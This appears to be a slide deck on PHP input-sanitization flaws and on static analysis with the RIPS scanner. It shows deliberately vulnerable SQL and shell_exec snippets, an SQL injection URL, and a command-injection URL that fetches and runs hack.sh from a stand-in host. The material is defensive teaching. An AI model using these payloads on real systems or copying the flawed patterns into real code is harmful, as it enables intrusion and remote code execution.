Vulnerabilities crash course

Unsanitized user input

Quick quiz:

What happens next? 

$id = $_GET['id']; 
$username = "user" . $id;
mysqli_query( "
	SELECT * 
	FROM Users 
	WHERE Username = '" . $username . "' AND Valid = 1" );

Source: http://lotr.wikia.com

Problem:

http://example.com/?id=1' OR 1 # 

$id = $_GET['id']; 
$username = "user" . $id;
mysqli_query( "
	SELECT * 
	FROM Users 
	WHERE Username = '" . $username . "' AND Valid = 1" );
				
SELECT * 
FROM Users 
WHERE Username = 'user1' OR 1 # AND Valid = 1"

Source: http://xkcd.com/327
title="Her daughter is named Help I'm trapped in a driver's license factory."

Okay, but that was fairly obvious!

But what about... 

foreach ( $_REQUEST as $key => $value )
{
	$$key = $value;
}
...
// 25 lines of miscellanious, unrelated code
...
mysqli_query(
	"SELECT * FROM Users WHERE Username = '" . $username . "'" );

Source: http://lotr.wikia.com

"Just don't do it"

My problem: 

$taintedCmd = "wc -w " . $_GET['file'];
shell_exec( $taintedCmd );

Source: http://lotr.wikia.com

Problem:

http://example.com/?file=
  file.txt' &&
  wget http://dogeysite.com/hack.zip &&
  unzip hack.zip &&
  ./hack.sh #

First thought: 

grep -r -B 10 -i "shell_exec" >> commandExecutions.txt 
        
...
file.php-     $cmd = "find -name '" . $name . "' documents/";
file.php-   }
file.php- }   
file.php: echo shell_exec( $cmd );

http://www.sciencephoto.com

But...

http://looneytunes09.files.wordpress.com/2010/08/landfill.jpg

How do you detect vulnerabilities in code?

http://www.google.com.au/search?q=
  how+do+you+detect+vulnerabilities+in+code

Static Code Analysis (SCA)

Source Code Analysis

Static Program Analysis

Compile Time Analysis (well, not for PHP)

Analysis without execution

Optimising compilers (e.g. g++)

IDE's with type checking/code completion

Step 1: Lexical analysis

Split code into tokens

Source: http://sourceforge.net/projects/rips-scanner/files/rips-paper.pdf/download

Step 2: Semantic analysis

print "print";

First print is a command

Second print is a string

Source: http://sourceforge.net/projects/rips-scanner/files/rips-paper.pdf/download

Step 3: Control flow analysis

function firstCall( $input ) {
	return secondCall( $input ) . " - 1st";
}

function secondCall( $input ) {
	return $input . " - 2nd";
}

firstCall( "input" );
Source: http://sourceforge.net/projects/rips-scanner/files/rips-paper.pdf/download

Step 4: Data flow analysis

function firstCall( $input ) {
	return secondCall( escapeshellarg( $input ) );
}

function secondCall( $input ) {
	return shell_exec( $input ); // Is $input safe?
}

firstCall( $_GET['input'] );  // Safe
secondCall( $_GET['input'] ); // Not-safe
Source: http://sourceforge.net/projects/rips-scanner/files/rips-paper.pdf/download
http://www.flickr.com/photos/ruthyyy/5000648691

RIPS - PHP Scanner

http://www.phpscanner.net

Example time

Example 1

shell_exec( $_GET['input'] );
http://rips.gamma.peter.serwylo.com/
/srv/http-rips/tests/vuln1.php

Example 2

function vulnFunction( $cmd ) {
	$result = shell_exec( $cmd );
}

function intermittentFunction( $input ) {
	$param = "test " . $input . " bleh";
	vulnFunction( $param );
}

$firstHand = $_GET['input'];
$secondHand = "IMZ TAINTED: " . $firstHand . ", YEAH!";

intermittentFunction( $secondHand );
http://rips.gamma.peter.serwylo.com/
/srv/http-rips/tests/vuln2.php

Miscellanious PHP projects from freecode.com

(formally freshmeat.net)

Example 3


False Positives


http://www.cancrusher.co.za

Custom Securing Functions

http://winningateverything.com

Custom Securing Functions

config/securing.php 

// securing functions for file handling
$F_SECURING_FILE = array(
	'sanitize_filename'
);

Custom Securing Functions

config/securing.php 

// securing functions for every vulnerability
$F_SECURING_STRING = array(
	'sanitize_int',
	'intval',
	'floatval',
	'md5',
	...

Limitations

What I'd love to see

Plugins for php compilers (e.g. HipHop/phc/rphp)

Thanks for listening

Questions?